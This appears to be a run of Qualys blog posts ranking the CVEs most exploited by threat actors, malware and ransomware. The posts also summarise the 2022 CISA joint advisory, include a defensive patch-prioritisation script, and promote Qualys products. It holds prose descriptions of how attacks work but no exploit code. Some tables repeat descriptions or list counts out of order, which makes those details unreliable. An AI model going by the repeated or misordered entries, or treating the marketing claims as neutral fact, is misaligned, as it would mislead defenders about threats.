In 2016, APT28 reportedly attempted to interfere with the U.S. presidential elections. \nWicked Panda | 30 | Also known as Axiom, Winnti, APT41, or Bronze Atlas. This group conducts financially motivated operations. It has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. \nRicochet Chollima | 26 | Also known as APT37, Reaper, and ScarCruft, they primarily target financial institutions, academics, and journalists. \nLabyrinth Chollima | 24 | A sub-group of the Lazarus Group attributed to the Reconnaissance General Bureau. It was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment, part of the campaign Novetta named Operation Blockbuster. \nStardust Chollima | 22 | Also known as BlueNoroff, a sub-group of the Lazarus Group attributed to the Reconnaissance General Bureau. It targets banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. \nCarbon Spider | 22 | Also known as Carbanak, FIN7, and Anunak, this financially motivated group targets the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. \nCozy Bear | 20 | Also known as APT29, it often targets government networks in Europe and NATO member countries, research institutes, and think tanks. \nAPT37 | 20 | Also linked to the following campaigns between 2016 and 2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are You Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018. \n \nTable 2. 
Most Active Threat Actors for High-Risk Vulnerabilities \n\n## Top Ten Most Exploited Vulnerabilities by Malware\n\nNow, let\u2019s look at some of the vulnerabilities most commonly exploited by malware.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares.png>)Fig 4. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\nTitle | CVE | Malware Count | TruRisk Score (QVS) | Description \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 467 | 100 | The absolute granddaddy of all CVEs exploited by malware. In the history of CVEs, this would be the most beloved malware CVE of all time. \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 92 | 100 | [Allows a malicious actor to download a Visual Basic script containing PowerShell commands. Works reliably across a wide attack surface. Popular with APT groups.](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 91 | 100 | Exploits a vulnerability in the JRE to download and install files of an attacker\u2019s choice onto the system. \nMicrosoft Office Remote Code Execution Vulnerability | CVE-2017-8570 | 52 | 100 | [Executes remote code by tricking the user into opening a malicious RTF file. Bypasses the patch for CVE-2017-0199. Known to be used in malware spam campaigns.](<https://www.zscaler.com/blogs/security-research/cve-2017-8570-and-cve-2018-0802-exploits-being-used-spread-lokibot>) \nWindows Graphics Device Interface (GDI) RCE | CVE-2019-0903 | 30 | 93 | Exploits a vulnerability in the Graphics Component, a fundamental part of the Windows OS used for rendering graphics. \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 29 | 100 | Exploits an Equation Editor flaw left open by the patch for CVE-2017-11882. 
\nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 19 | 100 | [Server-side request forgery that lets an unauthenticated attacker authenticate as the Exchange server; chained with CVE-2021-27065 it gives remote code execution in the default configuration. Heavily exploited by the Hafnium group among others.](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 17 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, letting the attacker instantly become a domain admin on enterprise networks. \nMicrosoft Windows CryptoAPI Spoofing Vulnerability | CVE-2020-0601 | 17 | 95 | Enables attackers to execute spoofing attacks, masquerading malicious programs as legitimate software apparently authenticated with a genuine digital signature. This essentially allows the delivery of malware under the guise of legitimate software. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Pre-authentication path confusion that lets an unauthenticated attacker reach Exchange backend endpoints. Chained with CVE-2021-34523 and CVE-2021-31207 it yields remote code execution, making it attractive to cybercriminals. \n \nTable 3. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\n## Top Ten Most Active Malware\n\nAnd here\u2019s a list of the ten most common malware names known to exploit vulnerabilities to compromise systems.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares.png>)Fig 5. Most Active Malware for High-Risk Vulnerabilities\n\nMalware | CVE Count | Description \n---|---|--- \nHeuristic | 117 | Not a single family but a generic label for malware detected by heuristic analysis rather than by signature (detection names such as Heur.Invader, which compromises a device\u2019s security and antivirus measures). 
Examples include adware and Trojans. \nWacatac | 94 | Also known as Trojan:Win32/Wacatac.B, a trojan horse designed to steal personal information such as passwords, credit card numbers, and other sensitive data. \nPidief | 73 | Detection name for malicious PDF documents that exploit Adobe Reader and Acrobat vulnerabilities to drop and run other malware. \nSkeeyah | 52 | A file infector that modifies executable files, such as .exe files, so that the Skeeyah malware executes when the file is opened. \nBitrep | 49 | Trojan horse that infiltrates a computer via a vulnerability in Adobe Flash, downloaded from a malicious website without user knowledge or consent; may cause performance degradation and security malfunctions leading to unauthorized users gaining remote access. \nMeterpreter | 46 | The in-memory payload of the Metasploit Framework, used by attackers to control compromised hosts remotely without writing anything to disk. It can log keystrokes, recording keyboard input to steal credentials (logins, passwords) for various accounts and personal information. \nSwifi | 42 | Trojan horse that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent and may cause performance degradation and security malfunctions leading to unauthorized users gaining remote access. \nIFrame | 38 | Malicious iframes are used to inject content into a website and spread through malicious websites containing iframes with malicious content. \nLotoor | 35 | Infects Android devices, often spread through malicious apps available on third-party app stores. These apps may appear legitimate but actually contain the Lotoor malware. 
Redirector | 34 | Redirects users to malicious websites without their knowledge or consent. This type of malware can be very dangerous, leading users to download other malicious software or enter personal information.

Table 4. Most Active Malware for High-Risk Vulnerabilities

## Top Ten Vulnerabilities Exploited by Ransomware

Lastly, let's examine the vulnerabilities that ransomware tends to exploit. **Ransomware is a particular type of malware that encrypts data on storage systems, rendering them inaccessible unless the victim pays a ransom, typically in Bitcoin.** Since the notorious WannaCry crypto-ransomware incident in May 2017, the use of such malicious software has escalated notably.

The latest report of this escalating threat involves a data breach during a MOVEit transfer, for which the BlackCat ransomware gang claimed responsibility. The same group claims to be behind the data theft attack on Reddit.

[Fig 6. Top Ten Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware.png>)

**Title** | **CVEs** | **Ransomware Count** | **TruRisk Score (QVS)** | **Description**
---|---|---|---|---
Microsoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 14 | 100 | Memory corruption in the Equation Editor of Microsoft Office that allows arbitrary code execution under the current user's permissions when a specially crafted file is opened.
Java AtomicReferenceArray deserialization RCE | CVE-2012-0507 | 42 | 100 | Exploits a vulnerability in the JRE to download and install files of an attacker's choice onto the system by tricking the user into visiting a malicious link. An old CVE, but still relevant.
Java Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 13 | 100 | Exploits a vulnerability in the JRE to download and install files of an attacker's choice onto the system.
Windows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0145 | 13 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was used by the [WannaCry crypto worm](<https://en.wikipedia.org/wiki/WannaCry_ransomware_attack>) as part of a worldwide cyberattack.
Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the Exchange server. It can be chained with CVE-2021-34523 and CVE-2021-31207, making it more attractive to cybercriminals.
Pulse Connect Secure SSL VPN Vulnerability | CVE-2019-11510 | 12 | 100 | Allows an unauthenticated, remote attacker to read arbitrary files, giving access to private keys or user/password information that is then used to gain further unauthorized access.
Windows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0144 | 12 | 95 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was leveraged by the WannaCry crypto worm as part of a worldwide cyberattack.
Microsoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 11 | 93 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks.
Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 10 | 100 | Elevation of privilege in Exchange Server, chained with CVE-2021-34473 and CVE-2021-31207 in ProxyShell attacks.
Citrix Application Delivery Controller/NetScaler RCE | CVE-2019-19781 | 10 | 100 | Allows an unauthenticated attacker to execute arbitrary code on the system. Was leveraged to drop NOTROBIN malware to maintain persistent access.

Table 5. Top 10 Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities

[Fig 7. Most Active Ransomware for High-Risk Vulnerabilities](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares.png>)

**Ransomware** | **CVEs Count** | **Description**
---|---|---
**Conti** | 30 | Conti is a Ransomware-as-a-Service (RaaS) that targets corporations and agencies by stealing sensitive data and threatening to publish it unless a ransom is paid. It uses unique encryption keys for each file and victim and leverages the Windows Restart Manager to unlock files for encryption.
**Cerber** | 30 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin.
**REvil** | 25 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin.
**Sodinokibi** | 21 | A successor to REvil that is even more sophisticated. It can encrypt files on all types of devices, including servers, laptops, and mobile phones.
**Lucky** | 21 | This ransomware is known for its aggressive spam campaigns. It sends emails with malicious attachments that, when opened, infect the victim's computer with ransomware.
**GandCrab** | 19 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing.
**Ryuk** | 17 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing.
**Reveton** | 16 | Known for its scareware tactics, this ransomware displays a fake warning message claiming the victim's computer has been infected with malware. The message demands that the victim pay a ransom to remove the malware.
**STOP** | 15 | Its operators are known to be aggressive and persistent, often threatening to release stolen data or to attack systems again if the ransom is not paid.
**Satan** | 15 | The ransom demanded by Satan ransomware can be very high, and there is no guarantee that victims will get their data back even if they pay. Used in attacks against high-profile organizations, healthcare, education, government, and businesses of all sizes.

Table 6. Most Active Ransomware for High-Risk Vulnerabilities

## Prioritizing Exploited Vulnerabilities with Qualys VMDR and TruRisk

Malicious actors frequently target diverse sets of vulnerabilities to accomplish their objectives. Keeping track of who is exploiting what can be daunting, and it is not an efficient use of time for practitioners or security and risk management leaders.

**Qualys VMDR with TruRisk** substantially simplifies prioritization by translating the risk associated with vulnerabilities, assets, and asset groups into a score that both technical and non-technical teams can understand.

Note that every vulnerability listed above has a TruRisk Score (QVS) above 90. TruRisk re-evaluates the underlying factors daily and consistently assigns these vulnerabilities a score above 90.

So, from a prioritization standpoint, any issue with a score of 90 or above should be prioritized and remediated immediately.

Let's take CVE-2017-11882 as an example. The TruRisk score clearly indicates why this is a high-risk vulnerability, with more than 400 malware and 50 threat actors exploiting it, and **we see evidence of exploitation as recently as July 16th, 2023, for a 6-year-old vulnerability.**

[Fig 8. Microsoft Office Memory Corruption Vulnerability: CVE-2017-11882](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882.jpg>)

## Assess Your Organization's Exposure to Risk / TruRisk Dashboard

Qualys VMDR helps organizations get instant visibility into high-risk vulnerabilities, especially those exploited in the wild.

[Fig 9. Qualys VMDR TruRisk Dashboard for High-Risk Vulnerabilities](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1.jpg>)

The fastest way to gain insight into your TruRisk is to download the TruRisk Dashboard and import it into your VMDR subscription.

The TruRisk VMDR Dashboard is available here: [Download the Dashboard](<https://blog.qualys.com/wp-content/uploads/2023/07/Qualys_VMDR_TruRisk__UDDashboard.zip>)

Once you have that visibility, patch with Qualys Patch Management to reduce the risk immediately.

## Key Insights & Takeaways

 * The time to Known Exploited Vulnerability (KEV) listing is down to eight days for CVEs published in 2023. Defenders should leverage automation to patch high-risk vulnerabilities.
 * CVE-2017-11882 stands out as the pinnacle among CVEs in its exploitation by malware, threat actors, and ransomware groups. With over 400 malware, 50 threat actors, and 14 ransomware groups taking advantage of this vulnerability, it will likely be remembered as the most cherished attacker CVE ever.
 * Attackers prominently exploit vulnerabilities in popular applications such as Microsoft Office, Microsoft Exchange, Windows operating systems, Java, Pulse Secure SSL VPN, and Citrix ADC/NetScaler. Attackers seek out these applications **primarily because of their widespread usage and the potential for exploiting their security weaknesses.**
 * Organizations should leverage threat intelligence to prioritize the vulnerabilities whose remediation most reduces the risk of exploitation.
 * Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a **TruRisk score of 90 or higher,** greatly simplifying the prioritization process.

The next blog concludes this series with the _**15 most exploited vulnerabilities ever**_.

Watch out for our next blog.

## References

 * <https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>
 * <https://blog.qualys.com/qualys-insights/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>
 * <https://blog.qualys.com/vulnerabilities-threat-research/2022/12/16/implement-risk-based-vulnerability-management-with-qualys-trurisk-part-2>
 * <https://blog.qualys.com/qualys-insights/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>

## Additional Contributor

Shreya Salvi, Data Scientist, Qualys

## Qualys Tackles 2022's Top Routinely Exploited Cyber Vulnerabilities

Qualys blog, published 2023-08-24.

A unified front against malicious cyber actors is critical in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, the United Kingdom, Australia, and New Zealand, is a critical guide to strengthening global cyber resilience. The agencies involved include the U.S.'s CISA, NSA, and FBI; Canada's CCCS; the U.K.'s NCSC-UK; Australia's ACSC; and New Zealand's NCSC-NZ and CERT NZ.

This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and underline the need for shared intelligence and coordinated strategies. The realization that cybersecurity is not limited by national borders but is a shared responsibility is growing ever more evident.

The CSA sheds light on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited in 2022 and the associated Common Weakness Enumeration(s) (CWE).
It outlines crucial technical details and key findings, providing actionable guidance and mitigation strategies. Vendors, designers, developers, and end-user organizations are strongly urged to implement these guidelines to strengthen their defenses against possible threats.

### The CSA identified the following key findings on the behaviors and tendencies of malicious cyber actors in 2022:

 * **Older Vulnerabilities Targeted**: Malicious cyber actors exploited older software vulnerabilities more frequently, targeting unpatched, internet-facing systems.
 * **Proof of Concept (PoC) Code**: Public availability of PoC code likely facilitated broader exploitation by malicious actors.
 * **Success in First Two Years**: Known vulnerabilities are most successfully exploited within the first two years of disclosure. Timely patching reduces this effectiveness.
 * **Prioritization of Severe CVEs**: Cyber actors prioritize severe and globally prevalent vulnerabilities, seeking low-cost, high-impact tools and paying attention to vulnerabilities prevalent in their specific targets' networks.
 * **Detection through Deep Packet Inspection**: Deep packet inspection can often detect exploits involving multiple CVEs or CVE chains.

In 2022, malicious cyber actors routinely exploited 12 severe vulnerabilities affecting various products and services. These included the long-exploited Fortinet SSL VPN flaw CVE-2018-13379 and widespread vulnerabilities such as Apache's Log4Shell (CVE-2021-44228). They affected multiple systems, from Microsoft Exchange email servers to Atlassian Confluence and software such as Zoho ManageEngine and VMware. The exploitation often resulted from organizations' failure to patch software or from publicly available proofs of concept (PoC), enabling remote code execution, privilege escalation, and authentication bypass.

The table below shows detailed information on these 12 vulnerabilities, along with Qualys-provided QIDs. A crucial commonality between these vulnerabilities is their potential to severely compromise system integrity, confidentiality, and availability. The Qualys Threat Research Unit (TRU) team addressed all of the critical vulnerabilities listed by providing QIDs within 24 hours. These critical vulnerabilities are categorized below based on their potential impact if exploited:

CVE/Vuln Name | Vendor/Product | Type | QID | QDS
---|---|---|---|---
CVE-2018-13379 | Fortinet - FortiOS and FortiProxy | SSL VPN Credential Exposure | 43702 | 100
CVE-2021-34473 (ProxyShell) | Microsoft - Exchange Server | RCE | 50114, 50107 | 100
CVE-2021-31207 (ProxyShell) | Microsoft - Exchange Server | Security Feature Bypass | 50114, 50111 | 95
CVE-2021-34523 (ProxyShell) | Microsoft - Exchange Server | Elevation of Privilege | 50114, 50112 | 100
CVE-2021-40539 | Zoho ManageEngine - ADSelfService Plus | RCE/Authentication Bypass | 375840 | 100
CVE-2021-26084 | Atlassian - Confluence Server and Data Center | Arbitrary code execution | 375839, 730172 | 100
CVE-2021-44228 (Log4Shell) | Apache - Log4j2 | RCE | 730447, 376521 | 100
CVE-2022-22954 | VMware - Workspace ONE Access and Identity Manager | RCE | 730447, 376521 | 100
CVE-2022-22960 | VMware - Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | 376521 | 95
CVE-2022-1388 | F5 Networks - BIG-IP | Missing Authentication Vulnerability | 730489, 376577 | 96
CVE-2022-30190 (Follina) | Microsoft - Multiple Products | RCE | 91909 | 100
CVE-2022-26134 | Atlassian - Confluence Server and Data Center | RCE | 376657, 730514 | 100

**Vulnerabilities Paving the Way for Data Theft and More:**

The following vulnerabilities could potentially lead to data theft or lay the groundwork for further attacks:

 * **CVE-2018-13379**, a flaw in the Fortinet FortiOS SSL VPN web portal, could be leveraged by attackers to gain unauthorized access to sensitive SSL VPN session data.
 * **CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207**, collectively known as the ProxyShell vulnerabilities affecting Microsoft Exchange Server, could enable bad actors to deploy web shells and execute arbitrary code on compromised devices.
 * **CVE-2022-1388**, an F5 BIG-IP iControl REST API vulnerability, could offer cyber criminals initial network access, enabling activities such as data theft or ransomware deployment.

**Vulnerabilities Leading to System Takeover:**

Next, the following vulnerabilities could potentially compromise an entire system:

 * **CVE-2021-44228**, or Log4Shell, a flaw in Apache's Log4j Java library that can lead to total system compromise.
 * **CVE-2021-26084 and CVE-2022-26134**, vulnerabilities in Atlassian's Confluence Server and Data Center, can allow an attacker to execute arbitrary code, leading to a potential system takeover.
 * **CVE-2021-40539**, an issue in Zoho ManageEngine ADSelfService Plus, can allow arbitrary code execution and potential system compromise.
 * **CVE-2022-30190**, found in the Microsoft Support Diagnostic Tool, can be exploited for remote code execution, potentially leading to full system compromise.
 * **CVE-2022-22954 and CVE-2022-22960**, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation, can allow remote code execution and privilege escalation, respectively, potentially leading to full system compromise.

### **Analyzing Vulnerability Remediation Patterns and the Urgency of Swift Patching**

Our data on the patching behavior for these 12 significant vulnerabilities is pulled from the Qualys TruRisk Platform. The data is anonymized so that no analysis can be traced back to a specific organization or asset.
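As an added example (not Qualys code, and not the analysis behind Fig 1), the following Python derives the two figures the plot contrasts, patch rate and average remediation days per CVE, from constructed anonymized detection records, and then orders the still-open findings by the rule from the previous post (a TruRisk/QDS score of 90 or above is remediated first). The asset identifiers, dates, and the low-score placeholder CVE are assumptions; the QDS values are the ones in the table above.

```python
"""Patch rate and average remediation days per CVE from anonymized detections.

Added example; not Qualys code and not the code behind the plot. It rebuilds
the two numbers the plot contrasts (patch rate, mean days to remediate) from
constructed records, then orders the still-open findings using the rule stated
in the previous post: a TruRisk/QDS score of 90 or above is remediated first.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import date
from statistics import mean
from typing import Dict, List, Optional, Tuple

# QDS values as given in the table of the 12 CSA vulnerabilities above.
QDS: Dict[str, int] = {
    "CVE-2018-13379": 100, "CVE-2021-34473": 100, "CVE-2021-31207": 95,
    "CVE-2021-34523": 100, "CVE-2021-40539": 100, "CVE-2021-26084": 100,
    "CVE-2021-44228": 100, "CVE-2022-22954": 100, "CVE-2022-22960": 95,
    "CVE-2022-1388": 96, "CVE-2022-30190": 100, "CVE-2022-26134": 100,
    # Constructed low-score placeholder (not a real CVE) so the threshold is
    # visible in the output; the table itself has nothing below 90.
    "CVE-0000-0000": 40,
}
PRIORITY_THRESHOLD = 90  # "a score of 90 or above should be immediately prioritized"


@dataclass(frozen=True)
class Detection:
    asset_id: str            # anonymized asset identifier (constructed)
    cve: str
    first_detected: date
    fixed: Optional[date]    # None while the finding is still open


@dataclass(frozen=True)
class CveStats:
    cve: str
    detections: int
    patch_rate: float                       # share of detections already fixed
    avg_remediation_days: Optional[float]   # None until at least one fix exists
    open_assets: Tuple[str, ...]


def analyse(detections: List[Detection]) -> Dict[str, CveStats]:
    """Group detections by CVE and compute the plot's two figures per CVE."""
    by_cve: Dict[str, List[Detection]] = {}
    for d in detections:
        by_cve.setdefault(d.cve, []).append(d)
    stats: Dict[str, CveStats] = {}
    for cve, rows in by_cve.items():
        fixed = [r for r in rows if r.fixed is not None]
        days = [(r.fixed - r.first_detected).days for r in fixed]
        stats[cve] = CveStats(
            cve=cve,
            detections=len(rows),
            patch_rate=len(fixed) / len(rows),
            avg_remediation_days=mean(days) if days else None,
            open_assets=tuple(sorted(r.asset_id for r in rows if r.fixed is None)),
        )
    return stats


def remediation_queue(stats: Dict[str, CveStats],
                      qds: Dict[str, int] = QDS,
                      threshold: int = PRIORITY_THRESHOLD) -> List[CveStats]:
    """Open findings in remediation order: score >= threshold first, then the
    CVEs exposing the most assets, then the ones with the lowest patch rate."""
    def key(s: CveStats):
        priority = 0 if qds.get(s.cve, 0) >= threshold else 1
        return (priority, -len(s.open_assets), s.patch_rate)
    return sorted((s for s in stats.values() if s.open_assets), key=key)


# Constructed, anonymized detection records (not real scan data).
SAMPLE: List[Detection] = [
    Detection("a1", "CVE-2021-44228", date(2022, 1, 3), date(2022, 1, 5)),
    Detection("a2", "CVE-2021-44228", date(2022, 1, 3), date(2022, 1, 9)),
    Detection("a3", "CVE-2021-44228", date(2022, 1, 4), date(2022, 1, 8)),
    Detection("a4", "CVE-2021-44228", date(2022, 2, 1), None),
    Detection("a1", "CVE-2018-13379", date(2022, 1, 3), date(2022, 3, 4)),
    Detection("a5", "CVE-2018-13379", date(2022, 1, 3), None),
    Detection("a6", "CVE-2018-13379", date(2022, 1, 3), None),
    Detection("a7", "CVE-2022-30190", date(2022, 6, 1), date(2022, 6, 15)),
    Detection("a8", "CVE-2022-30190", date(2022, 6, 1), date(2022, 6, 21)),
    Detection("a2", "CVE-0000-0000", date(2022, 1, 3), None),
    Detection("a5", "CVE-0000-0000", date(2022, 1, 3), None),
    Detection("a9", "CVE-0000-0000", date(2022, 1, 3), None),
]

if __name__ == "__main__":
    stats = analyse(SAMPLE)
    print(f"{'CVE':<16}{'patch rate':>12}{'avg days':>10}{'open':>6}")
    for s in stats.values():
        days = "-" if s.avg_remediation_days is None else f"{s.avg_remediation_days:.1f}"
        print(f"{s.cve:<16}{s.patch_rate:>12.0%}{days:>10}{len(s.open_assets):>6}")
    print("remediate in this order:", [s.cve for s in remediation_queue(stats)])
```

On the constructed records the Fortinet flaw comes first: it scores above the threshold and still exposes two assets with only a third of its detections fixed, even though Log4Shell was remediated faster on average.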
The data highlights a prominent challenge: some vulnerabilities see rapid mitigation, reflecting proactive security measures, while others face prolonged remediation times, raising concerns about prolonged exposure. Such disparities underline the importance of detecting and swiftly addressing vulnerabilities. As cyber threats grow in sophistication, the urgency to patch quickly and efficiently becomes paramount. The following plot, contrasting the patch rates and remediation times for the 12 frequently exploited vulnerabilities of 2022, further illustrates this point: while some vulnerabilities are quickly patched, others remain unaddressed for extended periods. This analysis reinforces the importance of timely vulnerability management and the pressing need to carry it out with speed and diligence, especially for high-risk vulnerabilities.

Fig 1. Patch Rate vs. Average Remediation Days for Top 12 Routinely Exploited Vulnerabilities in 2022

The damaging potential of these vulnerabilities highlights the vital importance of cybersecurity alertness. By understanding the risks and possible impacts of these threats, organizations can adopt proactive defense strategies, patching vulnerabilities and updating systems regularly to ensure the integrity of their environments. The advisory also emphasizes the criticality of accurately incorporating the CWE field in published CVEs to highlight vulnerability root causes and support industry-wide software security insights.

### **Aligning the Qualys Platform with the Joint Cybersecurity Advisory's Mitigation Guidelines**

The recent joint Cybersecurity Advisory (CSA) emphasizes the urgency of identifying exploited vulnerabilities, keeping all network assets updated, and implementing a robust patch management process. Among the recommendations are timely software updates, prioritizing patches for known vulnerabilities, performing automated asset discovery, and implementing centralized patch management.

Qualys' suite of products directly aligns with these critical recommendations. Qualys Cybersecurity Asset Management (CSAM) ensures 360-degree visibility of assets, aligning with the CSA's call for comprehensive asset discovery. Qualys Patch Management offers an advanced automated solution for timely updates, while Qualys VMDR facilitates the discovery, assessment, and prioritization of vulnerabilities. By leveraging Qualys' unified platform, organizations can efficiently adhere to the international best practices outlined in the CSA, enhancing their defense against cyber threats.

In addition, the joint Cybersecurity Advisory (CSA) stresses the need for robust protective controls and architecture. Key recommendations include securing internet-facing network devices, continuously monitoring the attack surface, and prioritizing secure-by-default configurations. There is a strong focus on hardening network protocols, managing access controls, and employing security tools such as EDR and SIEM for enhanced protection.

Qualys Threat Protection aligns with these recommendations by providing centralized control and comprehensive visibility of the threat landscape. By continuously correlating external threat information against vulnerabilities and the IT asset inventory, Qualys allows organizations to pinpoint and prioritize the most critical security threats. Whether managing vulnerabilities, controlling the threat prioritization process, or ensuring compliance with regulations, Qualys helps organizations align with the CSA's guidelines and achieve a fortified security posture.

Qualys TotalCloud also employs deep learning AI to continuously monitor the attack surface and investigate abnormal activity, aligning with CSA guidelines. It leverages an interconnected artificial neural network that detects known and unknown malware with over 99% accuracy in less than a second. Through these capabilities, Qualys TotalCloud delivers an advanced, rapid, and precise solution for malware detection in multi-cloud environments while bypassing the limitations of signature-based systems.

Fig 2. Qualys VMDR TruRisk Dashboard for top 12 routinely exploited vulnerabilities in 2022

The [Qualys VMDR TruRisk Dashboard](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Qualys-VMDR-TruRisk-UDdashboard.json_.zip>) (zipped JSON) gives organizations complete visibility into open vulnerabilities, focusing on the organization's global risk score, high-risk vulnerabilities, and top exploited vulnerabilities. Once you have identified the assets vulnerable to these top CVEs and assigned them to remediation owners, you can use Qualys Patch Management to reduce the risk immediately.

In conclusion, this Cybersecurity Advisory (CSA) offers valuable insights and mitigation strategies against routinely exploited vulnerabilities. Qualys provides robust solutions that align with the CSA's recommendations, including asset management, timely updates, vulnerability prioritization, and advanced threat detection capabilities in this growing threat landscape. Consequently, organizations can strengthen their defenses against cyber threats by adhering to the CSA guidelines and leveraging comprehensive cybersecurity solutions such as those from Qualys.
## References

[CISA, NSA, FBI and International Partners Issue Advisory on the Top Routinely Exploited Vulnerabilities in 2022](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>)

## Additional Contributors

 * Ramesh Ramachandran, Principal Product Manager, Qualys
 * Aubrey Perin, Lead Threat Intelligence Analyst, Qualys

The earlier blog posts gave an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers. A quick recap: we focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, on the time to CISA KEV listing being down to 8 days, and on the vulnerabilities most targeted by threat actors, malware, and ransomware.

This blog post will focus on **Qualys' Top Twenty Vulnerabilities** targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.

Some of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>), published on August 3, 2023; you can access it at [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>).

Read on.

## Stats on the Top 20 Vulnerable Vendors & Products

**Fig 1. Top Vulnerable Vendors**

**Fig 2. Top Vulnerable Products**

## Top Twenty Most Targeted by Attackers

### 1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability

**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**

It has been exploited by 467 malware, 53 threat actors, and 14 ransomware, and was trending in the wild as recently as August 31, 2023.

**Listed in the "Additional Routinely Exploited Vulnerabilities in 2022" list published earlier by CISA.**

**Qualys Vulnerability Detection (QID): 110308**

Disclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office's Equation Editor. It can enable an attacker to execute arbitrary code with the current user's permissions.
\n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. Exploitation requires the user to open a specially crafted file, typically delivered by email or hosted on a compromised website.\n\nIt has been exploited extensively in cyber-attacks and espionage campaigns, usually as the first stage of a malicious document that drops or downloads further malware.\n\n### 2\\. **CVE-2017-0199: Microsoft Office/WordPad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2017-0199 is a remote code execution vulnerability in the way specific Microsoft Office and WordPad versions parse specially crafted files. In the exploits seen in the wild, the document embeds an OLE2 link object that makes Office fetch and run a remote HTA (HTML Application) payload without any macros. It is the vulnerability most favored by malware, threat actors, and ransomware in this 